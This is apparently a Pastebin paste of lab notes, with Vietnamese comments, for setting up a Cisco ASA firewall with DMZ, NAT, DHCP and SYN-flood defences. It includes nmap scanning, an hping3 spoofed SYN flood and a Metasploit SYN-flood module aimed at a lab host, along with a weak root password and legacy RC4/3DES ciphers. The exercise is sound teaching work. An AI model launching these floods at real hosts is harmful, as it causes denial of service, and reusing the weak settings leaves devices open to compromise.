Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- en
- conf t
- hostname ASA
- domain-name team3.lab
- username root password team3 privilege 15
- crypto key generate rsa general-key modulus 2048
- write
- # Cau hinh may dieu khien
- show interface ip brief
- int Management0/0
- ip address 192.168.56.253 255.255.255.0
- no shutdown
- nameif Management
- management-only
- security-level 100
- exit
- # Cau hinh may dich vu
- interface GigabitEthernet0/1
- nameif dmz
- ip address 192.168.255.253 255.255.255.0
- no shutdown
- exit
- write
- # Cau hinh may inside
- interface GigabitEthernet0/0
- nameif inside
- ip address 192.168.100.253 255.255.255.0
- no shutdown
- exit
- write
- # Cau hinh may outside
- interface GigabitEthernet0/2
- nameif outside
- ip address 192.168.133.253 255.255.255.0
- no shutdown
- exit
- write
- # Cau hinh SSH
- aaa authentication ssh console LOCAL
- ssh 192.168.56.0 255.255.255.0 Management
- # Update firmware
- copy tftp: flash:
- http server enable
- http 192.168.56.0 255.255.255.0 Management
- ssl encryption rc4-sha1 aes128-sha1 aes256-sha1 3des-sha1
- conf t
- asdm image flash:/asdm-762-150.bin
- exit
- write
- # Update anyconnect
- copy tftp: flash:
- 192.168.56.1
- anyconnect-win-4.4.02039.pkg
- webvpn
- anyconnect image flash:/anyconnect-win-4.4.02039.pkg
- anyconnect enable
- write
- # DHCP cho vung inside
- dhcpd address 192.168.100.101-192.168.100.200 inside
- dhcpd dns 8.8.8.8 8.8.4.4 interface inside
- dhcpd lease 28880 interface inside
- dhcpd domain team3.lab interface inside
- dhcpd option 3 ip 192.168.100.253 interface inside
- dhcpd enable inside
- dhcpd address 192.168.255.101-192.168.255.200 dmz
- dhcpd dns 8.8.8.8 8.8.4.4 interface dmz
- dhcpd lease 28880 interface dmz
- dhcpd domain team3.lab interface dmz
- dhcpd option 3 ip 192.168.255.253 interface dmz
- dhcpd enable dmz
- dhcpd address 192.168.133.100-192.168.133.160 outside
- dhcpd dns 8.8.8.8 8.8.4.4 interface outside
- dhcpd lease 28880 interface outside
- dhcpd domain team3.lab interface outside
- dhcpd option 3 ip 192.168.133.253 interface outside
- dhcpd enable outside
- # Tao Object
- object network PUBLIC_IP
- range 192.168.133.100 192.168.133.160
- exit
- object network DMZ
- subnet 192.168.255.0 255.255.255.0
- exit
- object network INTERNAL
- subnet 192.168.100.0 255.255.255.0
- exit
- # Thiet lap NAT cho vung inside
- object network INTERNAL
- nat (inside,outside) dynamic interface
- exit
- object network DMZ
- nat (dmz,outside) dynamic interface
- exit
- object network PUBLIC_IP
- nat (outside,dmz) dynamic interface
- exit
- # Nat cho vung dmz
- object network WEB-SERVER
- host 192.168.255.129
- nat (dmz,outside) static interface service tcp 80 80
- exit
- object network WEB-SERVER
- host 192.168.255.129
- nat (dmz,outside) dynamic interface
- exit
- # DDos server 192.168.255.129
- -- Quet port dang bat tren server
- nmap -Pn -sS 192.168.255.129
- Hien cong 23/tcp
- -- Attack
- hping3 -S -p 80 --flood --rand-source 192.168.255.129
- # Tao access-list cho host 192.168.255.129
- access-list inside2outside permit ip 192.168.100.0 255.255.255.0 any
- access-list inside2outside permit icmp 192.168.100.0 255.255.255.0 any
- access-group inside2outside in interface inside
- access-list dmz2outside permit ip 192.168.255.0 255.255.255.0 any
- access-list dmz2outside permit icmp 192.168.255.0 255.255.255.0 any
- access-list dmz2outside permit tcp 192.168.255.0 255.255.255.0 any
- access-group dmz2outside in interface dmz
- access-list outside2dmz permit ip 192.168.133.0 255.255.255.0 any
- access-list outside2dmz permit icmp 192.168.133.0 255.255.255.0 any
- access-list outside2dmz permit tcp 192.168.133.0 255.255.255.0 any
- access-group outside2dmz in interface outside
- access-list syn permit tcp any host 192.168.255.129 eq telnet
- access-list syn permit tcp any host 192.168.255.129 eq ssh
- access-list syn permit tcp any host 192.168.255.129 eq http
- access-list syn permit tcp any host 192.168.255.129 eq https
- # Defence firewall
- access-list syn permit tcp any 192.168.255.129 eq 23
- class-map syn
- match access-list syn
- show run service-policy
- policy-map global_policy
- class dos
- set connection embryonic-conn-max 100
- end
- show run policy-map
- show conn count
- policy-map syn
- class dos
- set connection embryonic-conn-max 10000
- conf t
- access-list syn permit tcp any host 13.0.0.1 eq telnet
- access-list syn permit tcp any host 13.0.0.1 eq ssh
- access-list syn permit tcp any host 13.0.0.1 eq http
- access-list syn permit tcp any host 13.0.0.1 eq https
- access-list syn permit tcp any host 13.0.0.1
- write
- access-group syn in interface outside
- show resource usage all
- show threat-detection rate
- # Cau hinh may dich vu
- ifconfig eth0 192.168.255.129 netmask 255.255.255.0
- route add default gw 192.168.255.253 eth0
- msfconsole
- use auxiliary/dos/tcp/synflood
- show options
- set RHOST 192.168.255.129
- exploit
- access-list To_server permit tcp any host 192.168.255.101
- access-list To_server permit tcp any any
- class-map Traffic_to_dmz_server
- match access-list To_server
- exit
- policy-map global_policy
- class Traffic_to_dmz_server
- set connection embryonic-conn-max 5
- exit
- exit
- access-list To_server permit tcp any host 192.168.255.101
- access-list To_server permit tcp any any
- class-map Traffic_to_dmz
- match access-list outside2dmz
- exit
- policy-map global_policy
- class Traffic_to_dmz
- set connection embryonic-conn-max 5
- exit
- exit
- class-map outside2dmz
- match access-list outside2dmz
- policy-map global_policy
- class outside2dmz
- # Attack and defence
- -- Bat dich vu web
- sudo python -m SimpleHTTPServer 80
- -- Quet mo cong 80
- nmap -Pn -sS -p 80 192.168.255.129
- --
- hping3 -S -p 80 --flood --rand-source 192.168.255.129
- class outside2dmz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement